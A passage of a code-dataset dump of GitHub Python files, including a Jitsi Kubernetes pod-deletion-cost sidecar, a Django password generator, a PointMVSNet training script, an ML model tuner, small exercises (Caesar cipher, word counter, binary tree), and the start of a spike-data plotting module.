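    # series: shape (n, 1); returns X of shape (n - win_size, win_size)
    # and y of shape (n - win_size,), where y[i] follows X[i] in time.
    X, y = [], []
    for i in range(win_size, series.shape[0]):
        X.append(series[i - win_size:i, 0])
        y.append(series[i, 0])
    return np.array(X), np.array(y)

toy = np.arange(10, dtype=float).reshape(-1, 1)
X, y = make_windows(toy, win_size=3)
print(X.shape, y.shape)   # (7, 3) (7,)
print(X[0], y[0])         # [0. 1. 2.] 3.0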
\n# Finally, we enter the last sequence with output to forecast the next value in the series.\n\n\n","repo_name":"hengamirah/Malaysia_Covid_Cases_Prediction","sub_path":"Malaysia_Covid_Case_Prediction.py","file_name":"Malaysia_Covid_Case_Prediction.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15948451144","text":"#!/usr/bin/env python3\n\"\"\"\nThis script is meant to run as a sidecar-container on a jvb pod.\nIt updates the pod deletion cost annotation based on the number of\nparticipants on the JVB.\n\nFor more information on Pod deletion cost, see:\nhttps://kubernetes.io/docs/concepts/workloads/controllers/replicaset/#pod-deletion-cost\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport time\nimport signal\nfrom ssl import create_default_context\nimport sys\nfrom urllib import request\n\n# Time to wait between each jvb status check\nfrom urllib.error import HTTPError, URLError\n\nupdate_period_seconds = os.getenv(\"UPDATE_PERIOD_SECONDS\", 60)\n\n# -- JVB\n# URL to colibri API\n# https://github.com/jitsi/jitsi-videobridge/blob/master/doc/rest-colibri.md\ncolibri_api = os.getenv(\n \"COLIBRI_API\", \"http://127.0.0.1:8080/colibri/stats\"\n)\n\n# -- Kubernetes\n# URL to reach Kubernetes' API\nk8s_api = os.getenv(\"K8S_API\", \"https://kubernetes.default.svc\")\n# Path to ServiceAccount token\nservice_account_directory = os.getenv(\n \"K8S_SA_DIRECTORY\", \"/var/run/secrets/kubernetes.io/serviceaccount\"\n)\n\n# Reference the internal certificate authority (CA)\ncacert = f\"{service_account_directory}/ca.crt\"\n\n# Service account Bearer token\nbearer = open(f\"{service_account_directory}/token\", \"r\").read()\n\n# Current pod namespace\nnamespace = open(f\"{service_account_directory}/namespace\", \"r\").read()\npod_name = os.getenv(\"HOSTNAME\")\n\n# Exit gracefully if SIGTERM signal is sent\ndef sigterm_handler(_signo, _stack_frame):\n \"\"\"Exit gracefully.\"\"\"\n sys.exit(0)\nsignal.signal(signal.SIGTERM, sigterm_handler)\n\n\ndef get_colibri_stats():\n \"\"\"Call Colibri API and return stats.\"\"\"\n response = request.urlopen(colibri_api)\n if response.getcode() != 200:\n raise HTTPError(colibri_api, response.getcode(), \"Unexpected response code\", {}, None)\n return json.load(response)\n\n\ndef update_pod_metadata(pod_deletion_cost):\n \"\"\"\n Call Kubernetes API to update the status label and the pod deletion\n cost annotation.\n \"\"\"\n json_patch = json.dumps({\n \"metadata\": {\n \"annotations\": {\n \"controller.kubernetes.io/pod-deletion-cost\": str(pod_deletion_cost)\n }\n }\n })\n url = f\"{k8s_api}/api/v1/namespaces/{namespace}/pods/{pod_name}\"\n headers = {\n \"Authorization\": f\"Bearer {bearer}\",\n \"Content-Type\": \"application/merge-patch+json\",\n \"Accept\": \"application/json\",\n }\n ssl_context = create_default_context()\n ssl_context.load_verify_locations(cacert)\n patch_request = request.Request(\n url, data=json_patch.encode(), headers=headers, method=\"PATCH\"\n )\n response = request.urlopen(patch_request, context=ssl_context)\n if response.getcode() != 200:\n raise HTTPError(colibri_api, response.getcode(), \"Unexpected response code\", headers, None)\n\n\ndef get_pod_deletion_cost(stats):\n \"\"\"\n Given colibri stats, this function returns the number of participants on this JVB, \n which represents the cost of deleting this pod. 
Pods with lower deletion cost are \n preferred to be deleted before pods with higher deletion cost.\n \"\"\"\n total_participants = stats.get(\"participants\", 0)\n external_participants = stats.get(\"octo_endpoints\", 0)\n\n return total_participants - external_participants\n\n\n# Initialize logger\nlogging.basicConfig(\n format=\"[%(asctime)s][%(levelname)s] %(message)s\", level=logging.INFO\n)\n\n# This variable will contain the pod deletion cost\npod_deletion_cost = None\n\nwhile True:\n try:\n colibri_stats = get_colibri_stats()\n new_pod_deletion_cost = get_pod_deletion_cost(colibri_stats)\n except (URLError, HTTPError):\n logging.exception(\"Unable to get colibri stats\")\n new_pod_deletion_cost = pod_deletion_cost\n\n if new_pod_deletion_cost != pod_deletion_cost:\n try:\n update_pod_metadata(new_pod_deletion_cost)\n logging.info(\"pod-deletion-cost annotation updated to %s\", new_pod_deletion_cost)\n pod_deletion_cost = new_pod_deletion_cost\n except (FileNotFoundError, HTTPError, URLError):\n logging.exception(\"Unable to update pod metadata\")\n time.sleep(update_period_seconds)\n","repo_name":"openfun/jitsi-k8s","sub_path":"k8s/base/jvb-metadata-updater.py","file_name":"jvb-metadata-updater.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"75069345378","text":"def get_counts(file_name): \n\n dictionary = dict() #Empty dictionary\n \n file = open(file_name,'r') #Open files and put it in read mode\n \n count = 0 #The count variable, used to count how many words there are\n \n for line in file: \n text = file.read() #This takes the whole text itself\n raw_words = text.split() #This splits it into words\n \n for i in range(0, len(raw_words)): #Looping from 0 to \n words = raw_words[i].lower()\n if words in dictionary: #If the words are already in the dictionary, I added one to it\n dictionary[words] = dictionary[words] + 1\n count = count + 1 \n else:\n dictionary[words] = 1 #If the words are not in the dictionary, I make a new element and make it equal to one.\n count = count + 1 \n \n\n dictionary.update({'_total': count}) #Adds the last element \"Total\" into the dictionary with the amount of words\n \n print (dictionary) #Prints out the dictionary, to see how frequently used each words are\n \n file.close() #Closes file\n\nget_counts(\"hamlet-short.txt\") \n\n \n \n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n","repo_name":"cs-richardson/whosaiditpart1-2-tle21","sub_path":"Who Said It? .py","file_name":"Who Said It? 
.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9508066722","text":"# eingabe des zu versschlüsselnden Textes\nklartext = str(input('Gib ein Wort ein:'))\n# definieren der variable geheimtext\ngeheimtext = ''\n# schleife für string klartext\nfor zeichen in klartext:\n # ascii zahlencode abspeichern\n zahl = ord(zeichen)\n # ascii des neuen buchstabens\n neuezahl = zahl + 3\n # wenn neue zahl über Z ist\n if neuezahl > 90:\n # anderes ende des Alphabets\n neuezahl = neuezahl - 26\n # ascii zu buchstabe\n neueszeichen = chr(neuezahl)\n # geheimtext erweitern mit verschlüsseltem buchstaben\n geheimtext = geheimtext + neueszeichen\n# ausgabe des endtextes\nprint(geheimtext)","repo_name":"MarcoZ05/PY_11.2","sub_path":"14.02.22 AB Verschlüsselung, A7.py","file_name":"14.02.22 AB Verschlüsselung, A7.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12679520101","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nimport string\nimport random\nimport subprocess \nimport clipboard\n\n# Create your views here.\n\ndef index(request):\n return render(request, \"index.html\")\n\ndef home(request):\n return render(request, \"index.html\")\n\ndef copy(request, ena):\n data1 = ena\n print(data1)\n clipboard.copy(data1)\n messages.success(request, \" Your password coppied successfully\")\n return render(request, \"result2.html\")\n\ndef gen(request):\n\n if request.method == \"POST\":\n len = request.POST.get('length')\n\n upper = request.POST.get('uppercase', 'off')\n lower = request.POST.get('lowerercase', 'off')\n punc = request.POST.get('Punctions', 'off')\n digit = request.POST.get('digit', 'off')\n plen = len\n count = 0\n final = []\n\n if upper == \"on\":\n \n sU = string.ascii_uppercase\n #sU = list(su)\n #sU = random.shuffle(sU)\n result1 = []\n result1.extend(list(sU))\n random.shuffle(result1)\n result = (\"\".join(result1[0:1]))\n final = result\n count = count + 1\n\n if lower == \"on\":\n sL = string.ascii_lowercase\n result2 = []\n result2.extend(list(sL))\n random.shuffle(result2)\n result = (\"\".join(result2[0:1]))\n if final == []:\n final = result\n else:\n final = final + result\n #final.extend(list(result))\n count = count + 1\n\n if punc == \"on\":\n sP = string.punctuation\n result3 = []\n result3.extend(list(sP))\n random.shuffle(result3)\n result = (\"\".join(result3[0:1]))\n if final == []:\n final = result\n else:\n final = final + result\n count = count + 1\n\n if digit == \"on\":\n sD = string.digits\n result4 = []\n result4.extend(list(sD))\n random.shuffle(result4)\n result = (\"\".join(result4[0:1]))\n if final == []:\n final = result\n else:\n final = final + result\n count = count + 1\n\n sonkha = int(plen) - count\n\n #listToStr = ' '.join(map(str, s))\n\n while count >= 1:\n s1 = string.ascii_lowercase\n s2 = string.ascii_uppercase\n s3 = string.digits\n s4 = string.punctuation\n s = []\n s.extend(list(s1))\n s.extend(list(s2))\n s.extend(list(s3))\n s.extend(list(s4))\n random.shuffle(s)\n #p = (\"\".join(random.sample(s, plen)))\n p = (\"\".join(s[0:int(sonkha)]))\n lol = final + p\n params = {'purpose': 'Generated Password', 'ana': lol}\n\n return render(request, \"result.html\", params)\n else:\n s1 = string.ascii_lowercase\n s2 = string.ascii_uppercase\n s3 = string.digits\n s4 = 
string.punctuation\n s = []\n s.extend(list(s1))\n s.extend(list(s2))\n s.extend(list(s3))\n s.extend(list(s4))\n random.shuffle(s)\n\n #p = (\"\".join(random.sample(s, plen)))\n p = (\"\".join(s[0:int(plen)]))\n data1 = p\n\n #print(p)\n params = {'purpose': 'Generated Password', 'ana': p}\n\n return render(request, \"result.html\", params)\n\n\n return render(request, \"index.html\")\n","repo_name":"MdAbdulMalek/Password-Generator-Using-Django","sub_path":"passwordGenerator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32663355256","text":"#!/usr/bin/env python\nimport argparse\nimport os.path as osp\nimport logging\nimport time\nimport sys\nsys.path.insert(0, osp.dirname(__file__) + '/..')\n\nimport torch\nimport torch.nn as nn\n\nfrom pointmvsnet.config import load_cfg_from_file\nfrom pointmvsnet.utils.io import mkdir\nfrom pointmvsnet.utils.logger import setup_logger\nfrom pointmvsnet.utils.torch_utils import set_random_seed\nfrom pointmvsnet.model import build_pointmvsnet as build_model\nfrom pointmvsnet.solver import build_optimizer, build_scheduler\nfrom pointmvsnet.utils.checkpoint import Checkpointer\nfrom pointmvsnet.dataset import build_data_loader\nfrom pointmvsnet.utils.tensorboard_logger import TensorboardLogger\nfrom pointmvsnet.utils.metric_logger import MetricLogger\nfrom pointmvsnet.utils.file_logger import file_logger\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"PyTorch Point-MVSNet Training\")\n parser.add_argument(\n \"--cfg\",\n dest=\"config_file\",\n default=\"\",\n metavar=\"FILE\",\n help=\"path to config file\",\n type=str,\n )\n parser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n )\n\n args = parser.parse_args()\n return args\n\n\ndef train_model(model,\n loss_fn,\n metric_fn,\n image_scales,\n inter_scales,\n isFlow,\n data_loader,\n optimizer,\n curr_epoch,\n tensorboard_logger,\n log_period=1,\n output_dir=\"\",\n ):\n logger = logging.getLogger(\"pointmvsnet.train\")\n meters = MetricLogger(delimiter=\" \")\n model.train()\n end = time.time()\n total_iteration = data_loader.__len__()\n path_list = []\n\n for iteration, data_batch in enumerate(data_loader):\n data_time = time.time() - end\n curr_ref_img_path = data_batch[\"ref_img_path\"]\n path_list.extend(curr_ref_img_path)\n data_batch = {k: v.cuda(non_blocking=True) for k, v in data_batch.items() if isinstance(v, torch.Tensor)}\n\n preds = model(data_batch, image_scales, inter_scales, isFlow)\n optimizer.zero_grad()\n\n loss_dict = loss_fn(preds, data_batch, isFlow)\n metric_dict = metric_fn(preds, data_batch, isFlow)\n losses = sum(loss_dict.values())\n meters.update(loss=losses, **loss_dict, **metric_dict)\n\n losses.backward()\n\n optimizer.step()\n\n batch_time = time.time() - end\n end = time.time()\n meters.update(time=batch_time, data=data_time)\n\n if iteration % log_period == 0:\n logger.info(\n meters.delimiter.join(\n [\n \"EPOCH: {epoch:2d}\",\n \"iter: {iter:4d}\",\n \"{meters}\",\n \"lr: {lr:.2e}\",\n \"max mem: {memory:.0f}\",\n ]\n ).format(\n epoch=curr_epoch,\n iter=iteration,\n meters=str(meters),\n lr=optimizer.param_groups[0][\"lr\"],\n memory=torch.cuda.max_memory_allocated() / (1024.0 ** 2),\n )\n )\n tensorboard_logger.add_scalars(loss_dict, curr_epoch * total_iteration + iteration, prefix=\"train\")\n 
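The Django password-generator record above shadows the built-in `len`, duplicates one block per character class, and shuffles with `random`, which is not meant for secrets. A hedged sketch of the same idea on the standard `secrets` module, guaranteeing one character from each class (the names are illustrative, not part of the view code):

```python
import secrets
import string

def generate_password(length=12):
    classes = (string.ascii_uppercase, string.ascii_lowercase,
               string.digits, string.punctuation)
    if length < len(classes):
        raise ValueError("length must allow one character per class")
    # One guaranteed pick per class, then fill from the combined pool.
    chars = [secrets.choice(c) for c in classes]
    pool = "".join(classes)
    chars += [secrets.choice(pool) for _ in range(length - len(chars))]
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)
```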
tensorboard_logger.add_scalars(metric_dict, curr_epoch * total_iteration + iteration, prefix=\"train\")\n\n if iteration % (100 * log_period) == 0:\n file_logger(data_batch, preds, curr_epoch * total_iteration + iteration, output_dir, prefix=\"train\")\n\n return meters\n\n\ndef validate_model(model,\n loss_fn,\n metric_fn,\n image_scales,\n inter_scales,\n isFlow,\n data_loader,\n curr_epoch,\n tensorboard_logger,\n log_period=1,\n output_dir=\"\",\n ):\n logger = logging.getLogger(\"pointmvsnet.validate\")\n meters = MetricLogger(delimiter=\" \")\n model.train()\n end = time.time()\n total_iteration = data_loader.__len__()\n with torch.no_grad():\n for iteration, data_batch in enumerate(data_loader):\n data_time = time.time() - end\n curr_ref_img_path = data_batch[\"ref_img_path\"]\n\n data_batch = {k: v.cuda(non_blocking=True) for k, v in data_batch.items() if isinstance(v, torch.Tensor)}\n\n preds = model(data_batch, image_scales, inter_scales, isFlow)\n loss_dict = loss_fn(preds, data_batch, isFlow)\n metric_dict = metric_fn(preds, data_batch, isFlow)\n losses = sum(loss_dict.values())\n meters.update(loss=losses, **loss_dict, **metric_dict)\n batch_time = time.time() - end\n end = time.time()\n meters.update(time=batch_time, data=data_time)\n\n if iteration % log_period == 0:\n logger.info(\n meters.delimiter.join(\n [\n \"EPOCH: {epoch:2d}\",\n \"iter: {iter:4d}\",\n \"{meters}\",\n ]\n ).format(\n epoch=curr_epoch,\n iter=iteration,\n meters=str(meters),\n )\n )\n tensorboard_logger.add_scalars(meters.meters, curr_epoch * total_iteration + iteration, prefix=\"valid\")\n\n if iteration % (100 * log_period) == 0:\n file_logger(data_batch, preds, curr_epoch * total_iteration + iteration, output_dir, prefix=\"valid\")\n\n return meters\n\n\ndef train(cfg, output_dir=\"\"):\n logger = logging.getLogger(\"pointmvsnet.trainer\")\n\n # build model\n set_random_seed(cfg.RNG_SEED)\n model, loss_fn, metric_fn = build_model(cfg)\n logger.info(\"Build model:\\n{}\".format(str(model)))\n model = nn.DataParallel(model).cuda()\n\n # build optimizer\n optimizer = build_optimizer(cfg, model)\n\n # build lr scheduler\n scheduler = build_scheduler(cfg, optimizer)\n\n # build checkpointer\n checkpointer = Checkpointer(model,\n optimizer=optimizer,\n scheduler=scheduler,\n save_dir=output_dir,\n logger=logger)\n\n checkpoint_data = checkpointer.load(cfg.MODEL.WEIGHT, resume=cfg.AUTO_RESUME)\n ckpt_period = cfg.TRAIN.CHECKPOINT_PERIOD\n\n # build data loader\n train_data_loader = build_data_loader(cfg, mode=\"train\")\n val_period = cfg.TRAIN.VAL_PERIOD\n val_data_loader = build_data_loader(cfg, mode=\"val\") if val_period > 0 else None\n\n # build tensorboard logger (optionally by comment)\n tensorboard_logger = TensorboardLogger(output_dir)\n\n # train\n max_epoch = cfg.SCHEDULER.MAX_EPOCH\n start_epoch = checkpoint_data.get(\"epoch\", 0)\n best_metric_name = \"best_{}\".format(cfg.TRAIN.VAL_METRIC)\n best_metric = checkpoint_data.get(best_metric_name, None)\n logger.info(\"Start training from epoch {}\".format(start_epoch))\n for epoch in range(start_epoch, max_epoch):\n cur_epoch = epoch + 1\n scheduler.step()\n start_time = time.time()\n train_meters = train_model(model,\n loss_fn,\n metric_fn,\n image_scales=cfg.MODEL.TRAIN.IMG_SCALES,\n inter_scales=cfg.MODEL.TRAIN.INTER_SCALES,\n isFlow=(cur_epoch > cfg.SCHEDULER.INIT_EPOCH),\n data_loader=train_data_loader,\n optimizer=optimizer,\n curr_epoch=epoch,\n tensorboard_logger=tensorboard_logger,\n log_period=cfg.TRAIN.LOG_PERIOD,\n 
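The `train_model` loop above follows the usual PyTorch step order: forward pass, `zero_grad()`, a dict of named losses summed into one scalar, `backward()`, then `step()`. Stripped of metering and logging, one step looks roughly like this (the argument shapes are placeholders, not the project's API):

```python
def train_step(model, optimizer, loss_fns, batch):
    """One optimization step in the style of the loop above (PyTorch)."""
    preds = model(batch)
    optimizer.zero_grad()
    loss_dict = {name: fn(preds, batch) for name, fn in loss_fns.items()}
    total = sum(loss_dict.values())   # a single scalar drives one backward pass
    total.backward()
    optimizer.step()
    return {name: float(loss) for name, loss in loss_dict.items()}
```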
output_dir=output_dir,\n )\n epoch_time = time.time() - start_time\n logger.info(\"Epoch[{}]-Train {} total_time: {:.2f}s\".format(\n cur_epoch, train_meters.summary_str, epoch_time))\n\n # checkpoint\n if cur_epoch % ckpt_period == 0 or cur_epoch == max_epoch:\n checkpoint_data[\"epoch\"] = cur_epoch\n checkpoint_data[best_metric_name] = best_metric\n checkpointer.save(\"model_{:03d}\".format(cur_epoch), **checkpoint_data)\n\n # validate\n if val_period < 1:\n continue\n if cur_epoch % val_period == 0 or cur_epoch == max_epoch:\n val_meters = validate_model(model,\n loss_fn,\n metric_fn,\n image_scales=cfg.MODEL.VAL.IMG_SCALES,\n inter_scales=cfg.MODEL.VAL.INTER_SCALES,\n isFlow=(cur_epoch > cfg.SCHEDULER.INIT_EPOCH),\n data_loader=val_data_loader,\n curr_epoch=epoch,\n tensorboard_logger=tensorboard_logger,\n log_period=cfg.TEST.LOG_PERIOD,\n output_dir=output_dir,\n )\n logger.info(\"Epoch[{}]-Val {}\".format(cur_epoch, val_meters.summary_str))\n\n # best validation\n cur_metric = val_meters.meters[cfg.TRAIN.VAL_METRIC].global_avg\n if best_metric is None or cur_metric > best_metric:\n best_metric = cur_metric\n checkpoint_data[\"epoch\"] = cur_epoch\n checkpoint_data[best_metric_name] = best_metric\n checkpointer.save(\"model_best\", **checkpoint_data)\n\n logger.info(\"Best val-{} = {}\".format(cfg.TRAIN.VAL_METRIC, best_metric))\n\n return model\n\n\ndef main():\n args = parse_args()\n num_gpus = torch.cuda.device_count()\n\n cfg = load_cfg_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n\n output_dir = cfg.OUTPUT_DIR\n if output_dir:\n config_path = osp.splitext(args.config_file)[0]\n config_path = config_path.replace(\"configs\", \"outputs\")\n output_dir = output_dir.replace('@', config_path)\n mkdir(output_dir)\n\n logger = setup_logger(\"pointmvsnet\", output_dir, prefix=\"train\")\n logger.info(\"Using {} GPUs\".format(num_gpus))\n logger.info(args)\n\n logger.info(\"Loaded configuration file {}\".format(args.config_file))\n logger.info(\"Running with config:\\n{}\".format(cfg))\n\n train(cfg, output_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"callmeray/PointMVSNet","sub_path":"pointmvsnet/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10906,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"34"} +{"seq_id":"11514561895","text":"from sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom xgboost import XGBRegressor\n\nfrom mlflow_operations import MLFlow_Operation\nfrom utils.logger import App_Logger\nfrom utils.model_utils import Model_Utils\nfrom utils.read_params import read_params\n\n\nclass Model_Finder:\n \"\"\"\n Description : This class shall be used to find the model with best accuracy and AUC score.\n \n Version : 1.2\n Revisions : Moved to setup to cloud \n \"\"\"\n\n def __init__(self, log_file):\n self.log_file = log_file\n\n self.class_name = self.__class__.__name__\n\n self.config = read_params()\n\n self.split_kwargs = self.config[\"base\"]\n\n self.mlflow_op = MLFlow_Operation(self.log_file)\n\n self.model_utils = Model_Utils()\n\n self.log_writer = App_Logger()\n\n self.rf_model = RandomForestRegressor()\n\n self.xgb_model = XGBRegressor()\n\n self.dt_model = DecisionTreeRegressor()\n\n def get_rf_model(self, train_x, train_y):\n \"\"\"\n Method Name : get_rf_model\n Description : get the parameters for Random Forest Algorithm which give the least 
r2 score\n Use Hyper Parameter Tuning.\n \n Output : The model with the best parameters\n On Failure : Write an exception log and then raise an exception\n \n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_rf_model.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n\n try:\n self.rf_model_name = self.rf_model.__class__.__name__\n\n self.rf_best_params = self.model_utils.get_model_params(\n self.rf_model, train_x, train_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.rf_model_name} model best params are {self.rf_best_params}\",\n self.log_file,\n )\n\n self.rf_model.set_params(**self.rf_best_params)\n\n self.log_writer.log(\n f\"Initialized {self.rf_model_name} with {self.rf_best_params} as params\",\n self.log_file,\n )\n\n self.rf_model.fit(train_x, train_y)\n\n self.log_writer.log(\n f\"Created {self.rf_model_name} based on the {self.rf_best_params} as params\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return self.rf_model\n\n except Exception as e:\n self.log_writer.exception_log(\n e, self.class_name, method_name, self.log_file\n )\n\n def get_xgboost_model(self, train_x, train_y):\n \"\"\"\n Method Name : get_xgboost_model\n Description : get the parameters for XGBoost Algorithm which give the least r2 score\n Use Hyper Parameter Tuning.\n\n Output : The model with the best parameters\n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_xgboost_model.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n\n try:\n self.xgb_model_name = self.xgb_model.__class__.__name__\n\n self.xgb_best_params = self.model_utils.get_model_params(\n self.xgb_model, train_x, train_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.xgb_model_name} model best params are {self.xgb_best_params}\",\n self.log_file,\n )\n\n self.xgb_model.set_params(**self.xgb_best_params)\n\n self.log_writer.log(\n f\"Initialized {self.xgb_model_name} model with best params as {self.xgb_best_params}\",\n self.log_file,\n )\n\n self.xgb_model.fit(train_x, train_y)\n\n self.log_writer.log(\n f\"Created {self.xgb_model_name} model with best params as {self.xgb_best_params}\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return self.xgb_model\n\n except Exception as e:\n self.log_writer.exception_log(\n e, self.class_name, method_name, self.log_file\n )\n\n def get_decision_tree_model(self, train_x, train_y, test_x, test_y):\n \"\"\"\n Method Name : get_decision_tree_model\n Description : get the parameters for XGBoost Algorithm which give the least r2 score.\n \n Output : The best model name and the model object\n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_decision_tree_model.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n try:\n self.dt_model_name = self.xgb_model.__class__.__name__\n\n self.dt_best_params = self.model_utils.get_model_params(\n self.dt_model, train_x, train_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.dt_model_name} model best params are {self.dt_best_params}\",\n self.log_file,\n )\n\n self.dt_model.set_params(**self.dt_best_params)\n\n self.log_writer.log(\n 
f\"Initialized {self.xgb_model_name} model with best params as {self.dt_best_params}\",\n self.log_file,\n )\n\n self.dt_model.fit(train_x, train_y)\n\n self.log_writer.log(\n f\"Created {self.xgb_model_name} model with best params as {self.dt_best_params}\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return self.dt_model\n\n except Exception as e:\n raise e\n\n def get_trained_models(self, train_x, train_y, test_x, test_y):\n \"\"\"\n Method Name : get_trained_models\n Description : Find out the Model which has the best score.\n \n Output : The best model name and the model object\n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_trained_models.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n\n try:\n self.xgb_model = self.get_xgboost_model(train_x, train_y)\n\n self.log_writer.log(\n f\"Got trained {self.xgb_model.__class__.__name__} model\", self.log_file\n )\n\n self.xgb_model_score = self.model_utils.get_model_score(\n self.xgb_model, test_x, test_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.xgb_model.__class__.__name__} model score is {self.xgb_model_score}\",\n self.log_file,\n )\n\n self.rf_model = self.get_rf_model(train_x, train_y)\n\n self.log_writer.log(\n f\"Got trained {self.rf_model.__class__.__name__} model\", self.log_file\n )\n\n self.rf_model_score = self.model_utils.get_model_score(\n self.rf_model, test_x, test_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.rf_model.__class__.__name__} model score is {self.rf_model_score}\",\n self.log_file,\n )\n\n self.dt_model = self.get_decision_tree_model(train_x, train_y)\n\n self.log_writer.log(\n f\"Got trained {self.dt_model.__class__.__name__} model\", self.log_file\n )\n\n self.dt_model_score = self.model_utils.get_model_score(\n self.dt_model, test_x, test_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.dt_model.__class__.__name__} model score is {self.dt_model_score}\",\n self.log_file,\n )\n\n lst = [\n (self.xgb_model, self.xgb_model_score),\n (self.rf_model, self.rf_model_score),\n (self.dt_model, self.dt_model_score),\n ]\n\n self.log_writer.log(\n \"Got list of tuples consisting of trained models and model scores\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return lst\n\n except Exception as e:\n self.log_writer.exception_log(\n e, self.class_name, method_name, self.log_file\n )\n\n def train_and_log_models(self, X_data, Y_data, log_file, idx):\n \"\"\"\n Method Name : train_and_log_models\n Description : The methods gets the trained models and performs logging of models,parameters and metrics to mlflow server \n \n Output : The trained models along with thier parameters and metrics are logged into mlflow server and artifacts are stored\n blob container \n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.train_and_log_models.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, log_file)\n\n try:\n x_train, x_test, y_train, y_test = train_test_split(\n X_data, Y_data, **self.split_kwargs\n )\n\n self.log_writer.log(\n f\"Performed train test split with kwargs as {self.split_kwargs}\",\n log_file,\n )\n\n lst = self.get_trained_models(x_train, y_train, x_test, y_test)\n\n 
self.log_writer.log(\n f\"Got trained models for {idx} cluster number\", log_file\n )\n\n self.mlflow_op.save_and_log_models(lst, idx)\n\n self.log_writer.log(\n \"Saved and logged all trained models to mlflow\", log_file\n )\n\n self.log_writer.start_log(\"exit\", self.class_name, method_name, log_file)\n\n except Exception as e:\n self.log_writer.exception_log(e, self.class_name, method_name, log_file)\n","repo_name":"sethusaim/Visibility-Climate-Kubernetes-Azure","sub_path":"model_training/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":10754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25033264493","text":"from collections import deque\n\n\nclass Node:\n def __init__(self,data):\n self.data = data\n self.right = None\n self.left = None\n \n def insert(self,data):\n root=self\n if root:\n if dataroot.data:\n #right\n if root.right:\n root.right.insert(data)\n else:\n root.right = Node(data)\n\n \n def PrintTree(self):\n if self.left:\n self.left.PrintTree()\n print( self.data),\n if self.right:\n self.right.PrintTree()\n\n\n\n\n\n#-------------NextRight---------------\ndef NextRight(root,key):\n qu = deque([])\n qu.append(root)\n while len(qu)!=0:\n flag=0\n for i in range(len(qu)):\n node = qu.popleft()\n if flag==1:\n return node.data\n if node.data==key:\n flag=1\n if node.left:\n qu.append(node.left)\n if node.right:\n qu.append(node.right)\n if flag==1:\n return -1\n\n\n\n\n\n\n\n\n\n\n# 4\n# 1 5\n# 2 6\n# 1.5 3 7\n# 2.5 \n\n\n\nroot = Node(4)\nroot.insert(1)\nroot.insert(2)\nroot.insert(1.5)\nroot.insert(3)\nroot.insert(5)\nroot.insert(6)\nroot.insert(7)\nroot.insert(2.5)\n\nkey = 2\nprint(NextRight(root,key))","repo_name":"abhinav215/DsAlgo","sub_path":"StriverTree/Extra/NextRight.py","file_name":"NextRight.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14425324814","text":"\"\"\"Plots for spatial measures and analyses.\"\"\"\n\nfrom copy import deepcopy\nfrom itertools import repeat\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom spiketools.utils.base import (listify, combine_dicts, relabel_keys,\n drop_key_prefix, subset_dict)\nfrom spiketools.utils.checks import check_array_lst_orientation\nfrom spiketools.utils.data import make_row_orientation, smooth_data, compute_range\nfrom spiketools.modutils.functions import get_function_parameters\nfrom spiketools.plts.annotate import add_dots, add_gridlines\nfrom spiketools.plts.settings import DEFAULT_COLORS\nfrom spiketools.plts.utils import check_ax, make_axes, savefig\nfrom 